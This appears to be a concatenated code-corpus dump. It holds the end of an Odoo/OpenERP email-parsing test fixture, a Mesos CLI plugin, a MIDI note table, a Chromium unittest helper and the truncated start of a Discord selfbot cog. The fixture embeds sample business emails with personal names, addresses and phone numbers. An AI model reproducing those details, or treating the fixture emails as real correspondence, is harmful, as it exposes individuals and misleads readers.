<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p> </p>
<p></p>
<div>
<div style="border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0in 0in 0in">
<p class="MsoNormal">
<b>
<span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">From:</span>
</b>
<span style="font-size:10.0pt;font-family:"Tahoma","sans-serif""> OpenERP Enterprise [mailto:sales@openerp.com] <br><b>Sent:</b> Wednesday, April 17, 2013 1:31 PM<br><b>To:</b> Matt Witters<br><b>Subject:</b> Re: your OpenERP.com registration</span></p><p></p>
<p></p>
</div>
</div>
<p class="MsoNormal"></p>
<p> </p>
<p>Hello Raoul Petitpoil, </p>
<p></p>
<p>I noticed you recently downloaded OpenERP. </p>
<p></p>
<p>You indicated that you wish to use OpenERP in your own company. We would like to know more about your your business needs and requirements, and see how we can help you. When would you be available to discuss your project ? </p>
<p></p>
<p>Best regards, </p>
<p></p>
<pre> <p> </p>
</pre>
<pre>--<p></p></pre>
<pre>Nicolas<p></p></pre>
<pre> <a href="http://openerp.com">http://openerp.com</a>
<p></p>
</pre>
<pre>Belgium: +32.81.81.37.00<p></p></pre>
<pre>U.S.: +1 (650) 307-6736<p></p></pre>
<pre>India: +91 (79) 40 500 100<p></p></pre>
<pre> <p></p></pre>
</div>
</div>"""
MSOFFICE_2_IN = ['We are currently investigating the possibility']
MSOFFICE_2_OUT = ['I noticed you recently downloaded OpenERP.', 'You indicated that you wish', 'Belgium: +32.81.81.37.00']
MSOFFICE_3 = """<div>
<div class="WordSection1">
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Hi Nicolas !</span></p><p></p>
<p></p>
<p class="MsoNormal">
<span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p> </p>
<p></p>
<p class="MsoNormal">
<span lang="EN-US" style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Yes I’d be glad to hear about your offers as we struggle every year with the planning/approving of LOA. </span></p><p></p>
<p></p>
<p class="MsoNormal">
<span lang="EN-US" style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">I saw your boss yesterday on tv and immediately wanted to test the interface. </span></p><p></p>
<p></p>
<p class="MsoNormal">
<span lang="EN-US" style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p> </p>
<p></p>
<div>
<p class="MsoNormal">
<b>
<span lang="NL-BE" style="font-size:10.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">Bien à vous, </span></b></p><p></p><b>
</b>
<p></p>
<p class="MsoNormal">
<b>
<span lang="NL-BE" style="font-size:10.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">Met vriendelijke groeten, </span></b></p><p></p><b>
</b>
<p></p>
<p class="MsoNormal">
<b>
<span lang="EN-GB" style="font-size:10.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">Best regards,</span></b></p><p></p><b>
</b>
<p></p>
<p class="MsoNormal">
<b>
<span lang="EN-GB" style="font-size:10.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">
</span></b></p><p><b> </b></p><b>
</b>
<p></p>
<p class="MsoNormal">
<b>
<span lang="EN-GB" style="font-size:10.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">R. Petitpoil <br></span>
</b>
<span lang="EN-GB" style="font-size:10.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">Human Resource Manager<b><br><br>Field Resource s.a n.v. <i> <br></i></b>Hermesstraat 6A <br>1930 Zaventem</span>
<span lang="EN-GB" style="font-size:8.0pt;font-family:"Tahoma","sans-serif";color:gray"><br></span>
<b>
<span lang="FR" style="font-size:10.0pt;font-family:Wingdings;color:#1F497D">(</span>
</b>
<b>
<span lang="FR" style="font-size:9.0pt;font-family:Wingdings;color:#1F497D"> </span>
</b>
<b>
<span lang="EN-GB" style="font-size:8.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">xxx.xxx </span>
</b>
<b>
<span lang="EN-GB" style="font-size:9.0pt;font-family:"Trebuchet MS","sans-serif";color:gray"><br></span>
</b>
<b>
<span lang="FR" style="font-size:10.0pt;font-family:"Wingdings 2";color:#1F497D">7</span>
</b>
<b>
<span lang="FR" style="font-size:9.0pt;font-family:"Wingdings 2";color:#1F497D"> </span>
</b>
<b>
<span lang="EN-GB" style="font-size:8.0pt;font-family:"Trebuchet MS","sans-serif";color:gray">+32 2 727.05.91<br></span>
</b>
<span lang="EN-GB" style="font-size:24.0pt;font-family:Webdings;color:green">P</span>
<span lang="EN-GB" style="font-size:8.0pt;font-family:"Tahoma","sans-serif";color:green"> <b> </b></span>
<b>
<span lang="EN-GB" style="font-size:9.0pt;font-family:"Trebuchet MS","sans-serif";color:green">Please consider the environment before printing this email.</span>
</b>
<span lang="EN-GB" style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:navy"> </span>
<span lang="EN-GB" style="font-family:"Calibri","sans-serif";color:navy">
</span></p><p></p>
<p></p>
</div>
<p class="MsoNormal">
<span lang="EN-US" style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">
</span></p><p> </p>
<p></p>
<div>
<div style="border:none;border-top:solid #B5C4DF 1.0pt;padding:3.0pt 0cm 0cm 0cm">
<p class="MsoNormal">
<b>
<span lang="FR" style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">De :</span>
</b>
<span lang="FR" style="font-size:10.0pt;font-family:"Tahoma","sans-serif""> OpenERP Enterprise [mailto:sales@openerp.com] <br><b>Envoyé :</b> jeudi 18 avril 2013 11:31<br><b>À :</b> Paul Richard<br><b>Objet :</b> Re: your OpenERP.com registration</span></p><p></p>
<p></p>
</div>
</div>
<p class="MsoNormal"></p>
<p> </p>
<p>Hello Raoul PETITPOIL, </p>
<p></p>
<p>I noticed you recently registered to our OpenERP Online solution. </p>
<p></p>
<p>You indicated that you wish to use OpenERP in your own company. We would like to know more about your your business needs and requirements, and see how we can help you. When would you be available to discuss your project ? </p>
<p></p>
<p>Best regards, </p>
<p></p>
<pre> <p> </p>
</pre>
<pre>--<p></p></pre>
<pre>Nicolas<p></p></pre>
<pre> <a href="http://openerp.com">http://openerp.com</a>
<p></p>
</pre>
<pre>Belgium: +32.81.81.37.00<p></p></pre>
<pre>U.S.: +1 (650) 307-6736<p></p></pre>
<pre>India: +91 (79) 40 500 100<p></p></pre>
<pre> <p></p></pre>
</div>
</div>"""
MSOFFICE_3_IN = ['I saw your boss yesterday']
MSOFFICE_3_OUT = ['I noticed you recently downloaded OpenERP.', 'You indicated that you wish', 'Belgium: +32.81.81.37.00']
# ------------------------------------------------------------
# Test cases coming from bugs
# ------------------------------------------------------------
# bug: read more not apparent, strange message in read more span
BUG1 = """<pre>Hi Migration Team,
Paragraph 1, blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah.
Paragraph 2, blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah.
Paragraph 3, blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah blah blah blah blah blah blah
blah blah blah blah blah blah blah blah.
Thanks.
Regards,
--
Olivier Laurent
Migration Manager
OpenERP SA
Chaussée de Namur, 40
B-1367 Gérompont
Tel: +32.81.81.37.00
Web: http://www.openerp.com</pre>"""
BUG_1_IN = [
'Hi Migration Team',
'Paragraph 1'
]
BUG_1_OUT = [
'Olivier Laurent',
'Chaussée de Namur',
'81.81.37.00',
'openerp.com',
]
BUG2 = """
<div>
<br>
<div class="moz-forward-container"><br>
<br>
-------- Original Message --------
<table class="moz-email-headers-table" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">Subject:
</th>
<td>Fwd: TR: OpenERP S.A. Payment Reminder</td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">Date: </th>
<td>Wed, 16 Oct 2013 14:11:13 +0200</td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">From: </th>
<td>Christine Herrmann <a class="moz-txt-link-rfc2396E" href="mailto:che@openerp.com"><che@openerp.com></a></td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">To: </th>
<td><a class="moz-txt-link-abbreviated" href="mailto:online@openerp.com">online@openerp.com</a></td>
</tr>
</tbody>
</table>
<br>
<br>
<br>
<div class="moz-forward-container"><br>
<br>
-------- Message original --------
<table class="moz-email-headers-table" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">Sujet:
</th>
<td>TR: OpenERP S.A. Payment Reminder</td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">Date :
</th>
<td>Wed, 16 Oct 2013 10:34:45 -0000</td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">De : </th>
<td>Ida Siwatala <a class="moz-txt-link-rfc2396E" href="mailto:infos@inzoservices.com"><infos@inzoservices.com></a></td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">Répondre
à : </th>
<td><a class="moz-txt-link-abbreviated" href="mailto:catchall@mail.odoo.com">catchall@mail.odoo.com</a></td>
</tr>
<tr>
<th nowrap="" valign="BASELINE" align="RIGHT">Pour :
</th>
<td>Christine Herrmann (che) <a class="moz-txt-link-rfc2396E" href="mailto:che@openerp.com"><che@openerp.com></a></td>
</tr>
</tbody>
</table>
<br>
<br>
<div>
<div class="WordSection1">
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Bonjour,</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Pourriez-vous
me faire un retour sur ce point.</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Cordialement</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<div>
<div style="border:none;border-top:solid #B5C4DF
1.0pt;padding:3.0pt 0cm 0cm 0cm">
<p class="MsoNormal"><b><span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">De :</span></b><span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">
Ida Siwatala [<a class="moz-txt-link-freetext" href="mailto:infos@inzoservices.com">mailto:infos@inzoservices.com</a>]
<br>
<b>Envoyé :</b> vendredi 4 octobre 2013 20:03<br>
<b>À :</b> 'Followers of
INZO-services-8-all-e-Maxime-Lisbonne-77176-Savigny-le-temple-France'<br>
<b>Objet :</b> RE: OpenERP S.A. Payment Reminder</span></p>
</div>
</div>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Bonsoir,</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Je
me permets de revenir vers vous par écrit , car j’ai
fait 2 appels vers votre service en exposant mon
problème, mais je n’ai pas eu de retour.</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Cela
fait un mois que j’ai fait la souscription de votre
produit, mais je me rends compte qu’il est pas adapté à
ma situation ( fonctionnalité manquante et surtout je
n’ai pas beaucoup de temps à passer à résoudre des
bugs). </span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">C’est
pourquoi , j’ai demandé qu’un accord soit trouvé avec
vous pour annuler le contrat (tout en vous payant le
mois d’utilisation de septembre).</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Pourriez-vous
me faire un retour sur ce point.</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Cordialement,</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D">Ida
Siwatala</span></p>
<p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D"></span></p>
<p> </p>
<p class="MsoNormal"><b><span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">De :</span></b><span style="font-size:10.0pt;font-family:"Tahoma","sans-serif"">
<a href="mailto:che@openerp.com">che@openerp.com</a>
[<a href="mailto:che@openerp.com">mailto:che@openerp.com</a>]
<br>
<b>Envoyé :</b> vendredi 4 octobre 2013 17:41<br>
<b>À :</b> <a href="mailto:infos@inzoservices.com">infos@inzoservices.com</a><br>
<b>Objet :</b> OpenERP S.A. Payment Reminder</span></p>
<p> </p>
<div>
<p style="background:white"><span style="font-size:9.0pt;font-family:"Arial","sans-serif";color:#222222">Dear
INZO services,</span></p>
<p style="background:white"><span style="font-size:9.0pt;font-family:"Arial","sans-serif";color:#222222">Exception
made if there was a mistake of ours, it seems that the
following amount stays unpaid. Please, take
appropriate measures in order to carry out this
payment in the next 8 days. </span></p>
<p class="MsoNormal" style="background:white"><span style="font-size:9.0pt;font-family:"Arial","sans-serif";color:#222222"></span></p>
<p> </p>
<table class="MsoNormalTable" style="width:100.0%;border:outset 1.5pt" width="100%" border="1" cellpadding="0">
<tbody>
<tr>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal">Date de facturation</p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal">Description</p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal">Reference</p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal">Due Date</p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal">Amount (€)</p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal">Lit.</p>
</td>
</tr>
<tr>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal"><b>2013-09-24</b></p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal"><b>2013/1121</b></p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal"><b>Enterprise - Inzo Services
- Juillet 2013</b></p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal"><b>2013-09-24</b></p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt">
<p class="MsoNormal"><b>420.0</b></p>
</td>
<td style="padding:.75pt .75pt .75pt .75pt"><br>
</td>
</tr>
<tr>
<td style="padding:.75pt .75pt .75pt .75pt"><br>
</td>
<td style="border:none;padding:.75pt .75pt .75pt
.75pt"><br>
</td>
<td style="border:none;padding:.75pt .75pt .75pt
.75pt"><br>
</td>
<td style="border:none;padding:.75pt .75pt .75pt
.75pt"><br>
</td>
<td style="border:none;padding:.75pt .75pt .75pt
.75pt"><br>
</td>
<td style="border:none;padding:.75pt .75pt .75pt
.75pt"><br>
</td>
</tr>
</tbody>
</table>
<p class="MsoNormal" style="text-align:center;background:white" align="center"><span style="font-size:9.0pt;font-family:"Arial","sans-serif";color:#222222">Amount
due : 420.00 € </span></p>
<p style="background:white"><span style="font-size:9.0pt;font-family:"Arial","sans-serif";color:#222222">Would
your payment have been carried out after this mail was
sent, please ignore this message. Do not hesitate to
contact our accounting department. </span></p>
<p class="MsoNormal" style="background:white"><span style="font-size:9.0pt;font-family:"Arial","sans-serif";color:#222222"><br>
Best Regards, <br>
Aurore Lesage <br>
OpenERP<br>
Chaussée de Namur, 40 <br>
B-1367 Grand Rosières <br>
Tel: +32.81.81.37.00 - Fax: +32.81.73.35.01 <br>
E-mail : <a href="mailto:ale@openerp.com">ale@openerp.com</a> <br>
Web: <a href="http://www.openerp.com">http://www.openerp.com</a></span></p>
</div>
</div>
</div>
--<br>
INZO services <small>Sent by <a style="color:inherit" href="http://www.openerp.com">OpenERP
S.A.</a> using <a style="color:inherit" href="https://www.openerp.com/">OpenERP</a>.</small>
<small>Access your messages and documents <a style="color:inherit" href="https://accounts.openerp.com?db=openerp#action=mail.action_mail_redirect&login=che&message_id=5750830">in
OpenERP</a></small> <br>
<pre class="moz-signature" cols="72">--
Christine Herrmann
OpenERP
Chaussée de Namur, 40
B-1367 Grand Rosières
Tel: +32.81.81.37.00 - Fax: +32.81.73.35.01
Web: <a class="moz-txt-link-freetext" href="http://www.openerp.com">http://www.openerp.com</a> </pre>
<br>
</div>
<br>
<br>
</div>
<br>
</div>"""
BUG_2_IN = [
'read more',
'...',
]
BUG_2_OUT = [
'Fwd: TR: OpenERP S.A'
'fait un mois'
]
# BUG 20/08/2014: READ MORE NOT APPEARING
BUG3 = """<div class="oe_msg_body_long" style="/* display: none; */"><p>OpenERP has been upgraded to version 8.0.</p>
<h2>What's new in this upgrade?</h2>
<div class="document">
<ul>
<li><p class="first">New Warehouse Management System:</p>
<blockquote>
<p>Schedule your picking, packing, receptions and internal moves automatically with Odoo using
your own routing rules. Define push and pull rules to organize a warehouse or to manage
product moves between several warehouses. Track in detail all stock moves, not only in your
warehouse but wherever else it's taken as well (customers, suppliers or manufacturing
locations).</p>
</blockquote>
</li>
<li><p class="first">New Product Configurator</p>
</li>
<li><p class="first">Documentation generation from website forum:</p>
<blockquote>
<p>New module to generate a documentation from questions and responses from your forum.
The documentation manager can define a table of content and any user, depending their karma,
can link a question to an entry of this TOC.</p>
</blockquote>
</li>
<li><p class="first">New kanban view of documents (resumes and letters in recruitement, project documents...)</p>
</li>
<li><p class="first">E-Commerce:</p>
<blockquote>
<ul class="simple">
<li>Manage TIN in contact form for B2B.</li>
<li>Dedicated salesteam to easily manage leads and orders.</li>
</ul>
</blockquote>
</li>
<li><p class="first">Better Instant Messaging.</p>
</li>
<li><p class="first">Faster and Improved Search view: Search drawer now appears on top of the results, and is open
by default in reporting views</p>
</li>
<li><p class="first">Improved User Interface:</p>
<blockquote>
<ul class="simple">
<li>Popups has changed to be more responsive on tablets and smartphones.</li>
<li>New Stat Buttons: Forms views have now dynamic buttons showing some statistics abouts linked models.</li>
<li>Color code to check in one look availability of components in an MRP order.</li>
<li>Unified menu bar allows you to switch easily between the frontend (website) and backend</li>
<li>Results panel is now scrollable independently of the menu bars, keeping the navigation,
search bar and view switcher always within reach.</li>
</ul>
</blockquote>
</li>
<li><p class="first">User signature is now in HTML.</p>
</li>
<li><p class="first">New development API.</p>
</li>
<li><p class="first">Remove support for Outlook and Thunderbird plugins</p>
</li>
</ul>
</div>
<p>Enjoy the new OpenERP Online!</p><span class="oe_mail_reduce"><a href="#">read less</a></span></div>"""
BUG_3_IN = [
'read more',
'...',
]
BUG_3_OUT = [
'New kanban view of documents'
]
| agpl-3.0 |
reneploetz/mesos | src/python/cli_new/lib/cli/plugins/agent/main.py | 9 | 2612 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The agent plugin.
"""
from cli.exceptions import CLIException
from cli.mesos import get_agents
from cli.plugins import PluginBase
from cli.util import Table
PLUGIN_NAME = "agent"
PLUGIN_CLASS = "Agent"
VERSION = "Mesos CLI Agent Plugin"
SHORT_HELP = "Interacts with the Mesos agents"
class Agent(PluginBase):
"""
The agent plugin.
"""
COMMANDS = {
"list": {
"arguments": [],
"flags": {},
"short_help": "List the Mesos agents.",
"long_help": "List information about the Mesos agents."
}
}
def list(self, argv):
"""
List the agents in a cluster by checking the /slaves endpoint.
"""
# pylint: disable=unused-argument
try:
master = self.config.master()
except Exception as exception:
raise CLIException("Unable to get leading master address: {error}"
.format(error=exception))
try:
agents = get_agents(master)
except Exception as exception:
raise CLIException("Unable to get agents from leading"
" master '{master}': {error}"
.format(master=master, error=exception))
if not agents:
print("The cluster does not have any agents.")
return
try:
table = Table(["Agent ID", "Hostname", "Active"])
for agent in agents:
table.add_row([agent["id"],
agent["hostname"],
str(agent["active"])])
except Exception as exception:
raise CLIException("Unable to build table of agents: {error}"
.format(error=exception))
print(str(table))
| apache-2.0 |
nflanders9/bach-in-a-box | midi_dicts.py | 1 | 2721 | __author__ = 'Nick Flanders'
frequencies = dict(A_0 = 9,
A_1 = 21,
A_2 = 33,
A_3 = 45,
A_4 = 57,
A_5 = 69,
A_6 = 81,
A_7 = 93,
A_8 = 105,
A_9 = 117,
Ab_0 = 8,
Ab_1 = 20,
Ab_2 = 32,
Ab_3 = 44,
Ab_4 = 56,
Ab_5 = 68,
Ab_6 = 80,
Ab_7 = 92,
Ab_8 = 104,
Ab_9 = 116,
As_0 = 10,
As_1 = 22,
As_2 = 34,
As_3 = 46,
As_4 = 58,
As_5 = 70,
As_6 = 82,
As_7 = 94,
As_8 = 106,
As_9 = 118,
B_0 = 11,
B_1 = 23,
B_2 = 35,
B_3 = 47,
B_4 = 59,
B_5 = 71,
B_6 = 83,
B_7 = 95,
B_8 = 107,
B_9 = 119,
Bb_0 = 10,
Bb_1 = 22,
Bb_2 = 34,
Bb_3 = 46,
Bb_4 = 58,
Bb_5 = 70,
Bb_6 = 82,
Bb_7 = 94,
Bb_8 = 106,
Bb_9 = 118,
C_0 = 0,
C_1 = 12,
C_10 = 120,
C_2 = 24,
C_3 = 36,
C_4 = 48,
C_5 = 60,
C_6 = 72,
C_7 = 84,
C_8 = 96,
C_9 = 108,
Cs_0 = 1,
Cs_1 = 13,
Cs_10 = 121,
Cs_2 = 25,
Cs_3 = 37,
Cs_4 = 49,
Cs_5 = 61,
Cs_6 = 73,
Cs_7 = 85,
Cs_8 = 97,
Cs_9 = 109,
D_0 = 2,
D_1 = 14,
D_10 = 122,
D_2 = 26,
D_3 = 38,
D_4 = 50,
D_5 = 62,
D_6 = 74,
D_7 = 86,
D_8 = 98,
D_9 = 110,
Db_0 = 1,
Db_1 = 13,
Db_10 = 121,
Db_2 = 25,
Db_3 = 37,
Db_4 = 49,
Db_5 = 61,
Db_6 = 73,
Db_7 = 85,
Db_8 = 97,
Db_9 = 109,
Ds_0 = 3,
Ds_1 = 15,
Ds_10 = 123,
Ds_2 = 27,
Ds_3 = 39,
Ds_4 = 51,
Ds_5 = 63,
Ds_6 = 75,
Ds_7 = 87,
Ds_8 = 99,
Ds_9 = 111,
E_0 = 4,
E_1 = 16,
E_10 = 124,
E_2 = 28,
E_3 = 40,
E_4 = 52,
E_5 = 64,
E_6 = 76,
E_7 = 88,
E_8 = 100,
E_9 = 112,
Eb_0 = 3,
Eb_1 = 15,
Eb_10 = 123,
Eb_2 = 27,
Eb_3 = 39,
Eb_4 = 51,
Eb_5 = 63,
Eb_6 = 75,
Eb_7 = 87,
Eb_8 = 99,
Eb_9 = 111,
F_0 = 5,
F_1 = 17,
F_10 = 125,
F_2 = 29,
F_3 = 41,
F_4 = 53,
F_5 = 65,
F_6 = 77,
F_7 = 89,
F_8 = 101,
F_9 = 113,
Fs_0 = 6,
Fs_1 = 18,
Fs_10 = 126,
Fs_2 = 30,
Fs_3 = 42,
Fs_4 = 54,
Fs_5 = 66,
Fs_6 = 78,
Fs_7 = 90,
Fs_8 = 102,
Fs_9 = 114,
G_0 = 7,
G_1 = 19,
G_10 = 127,
G_2 = 31,
G_3 = 43,
G_4 = 55,
G_5 = 67,
G_6 = 79,
G_7 = 91,
G_8 = 103,
G_9 = 115,
Gb_0 = 6,
Gb_1 = 18,
Gb_10 = 126,
Gb_2 = 30,
Gb_3 = 42,
Gb_4 = 54,
Gb_5 = 66,
Gb_6 = 78,
Gb_7 = 90,
Gb_8 = 102,
Gb_9 = 114,
Gs_0 = 8,
Gs_1 = 20,
Gs_2 = 32,
Gs_3 = 44,
Gs_4 = 56,
Gs_5 = 68,
Gs_6 = 80,
Gs_7 = 92,
Gs_8 = 104,
Gs_9 = 116)
| mit |
ThinkingBridge/platform_external_chromium_org | build/util/lib/common/unittest_util.py | 138 | 4879 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utilities for dealing with the python unittest module."""
import fnmatch
import sys
import unittest
class _TextTestResult(unittest._TextTestResult):
"""A test result class that can print formatted text results to a stream.
Results printed in conformance with gtest output format, like:
[ RUN ] autofill.AutofillTest.testAutofillInvalid: "test desc."
[ OK ] autofill.AutofillTest.testAutofillInvalid
[ RUN ] autofill.AutofillTest.testFillProfile: "test desc."
[ OK ] autofill.AutofillTest.testFillProfile
[ RUN ] autofill.AutofillTest.testFillProfileCrazyCharacters: "Test."
[ OK ] autofill.AutofillTest.testFillProfileCrazyCharacters
"""
def __init__(self, stream, descriptions, verbosity):
unittest._TextTestResult.__init__(self, stream, descriptions, verbosity)
self._fails = set()
def _GetTestURI(self, test):
return '%s.%s.%s' % (test.__class__.__module__,
test.__class__.__name__,
test._testMethodName)
def getDescription(self, test):
return '%s: "%s"' % (self._GetTestURI(test), test.shortDescription())
def startTest(self, test):
unittest.TestResult.startTest(self, test)
self.stream.writeln('[ RUN ] %s' % self.getDescription(test))
def addSuccess(self, test):
unittest.TestResult.addSuccess(self, test)
self.stream.writeln('[ OK ] %s' % self._GetTestURI(test))
def addError(self, test, err):
unittest.TestResult.addError(self, test, err)
self.stream.writeln('[ ERROR ] %s' % self._GetTestURI(test))
self._fails.add(self._GetTestURI(test))
def addFailure(self, test, err):
unittest.TestResult.addFailure(self, test, err)
self.stream.writeln('[ FAILED ] %s' % self._GetTestURI(test))
self._fails.add(self._GetTestURI(test))
def getRetestFilter(self):
return ':'.join(self._fails)
class TextTestRunner(unittest.TextTestRunner):
"""Test Runner for displaying test results in textual format.
Results are displayed in conformance with google test output.
"""
def __init__(self, verbosity=1):
unittest.TextTestRunner.__init__(self, stream=sys.stderr,
verbosity=verbosity)
def _makeResult(self):
return _TextTestResult(self.stream, self.descriptions, self.verbosity)
def GetTestsFromSuite(suite):
"""Returns all the tests from a given test suite."""
tests = []
for x in suite:
if isinstance(x, unittest.TestSuite):
tests += GetTestsFromSuite(x)
else:
tests += [x]
return tests
def GetTestNamesFromSuite(suite):
"""Returns a list of every test name in the given suite."""
return map(lambda x: GetTestName(x), GetTestsFromSuite(suite))
def GetTestName(test):
"""Gets the test name of the given unittest test."""
return '.'.join([test.__class__.__module__,
test.__class__.__name__,
test._testMethodName])
def FilterTestSuite(suite, gtest_filter):
"""Returns a new filtered tests suite based on the given gtest filter.
See http://code.google.com/p/googletest/wiki/AdvancedGuide
for gtest_filter specification.
"""
return unittest.TestSuite(FilterTests(GetTestsFromSuite(suite), gtest_filter))
def FilterTests(all_tests, gtest_filter):
"""Filter a list of tests based on the given gtest filter.
Args:
all_tests: List of tests (unittest.TestSuite)
gtest_filter: Filter to apply.
Returns:
Filtered subset of the given list of tests.
"""
test_names = [GetTestName(test) for test in all_tests]
filtered_names = FilterTestNames(test_names, gtest_filter)
return [test for test in all_tests if GetTestName(test) in filtered_names]
def FilterTestNames(all_tests, gtest_filter):
"""Filter a list of test names based on the given gtest filter.
See http://code.google.com/p/googletest/wiki/AdvancedGuide
for gtest_filter specification.
Args:
all_tests: List of test names.
gtest_filter: Filter to apply.
Returns:
Filtered subset of the given list of test names.
"""
pattern_groups = gtest_filter.split('-')
positive_patterns = pattern_groups[0].split(':')
negative_patterns = None
if len(pattern_groups) > 1:
negative_patterns = pattern_groups[1].split(':')
tests = []
for test in all_tests:
# Test name must by matched by one positive pattern.
for pattern in positive_patterns:
if fnmatch.fnmatch(test, pattern):
break
else:
continue
# Test name must not be matched by any negative patterns.
for pattern in negative_patterns or []:
if fnmatch.fnmatch(test, pattern):
break
else:
tests += [test]
return tests
| bsd-3-clause |
LittleEndu/Little-Discord-Selfbot | cogs/memes.py | 1 | 19548 | import asyncio
import json
import os
import random
import aiohttp
import discord
from discord.ext import commands
class Memes:
"""
idk, it does meme stuff
"""
def __init__(self, bot):
self.IMGUR_API_LINK = "https://api.imgur.com/3/image"
self.bot = bot
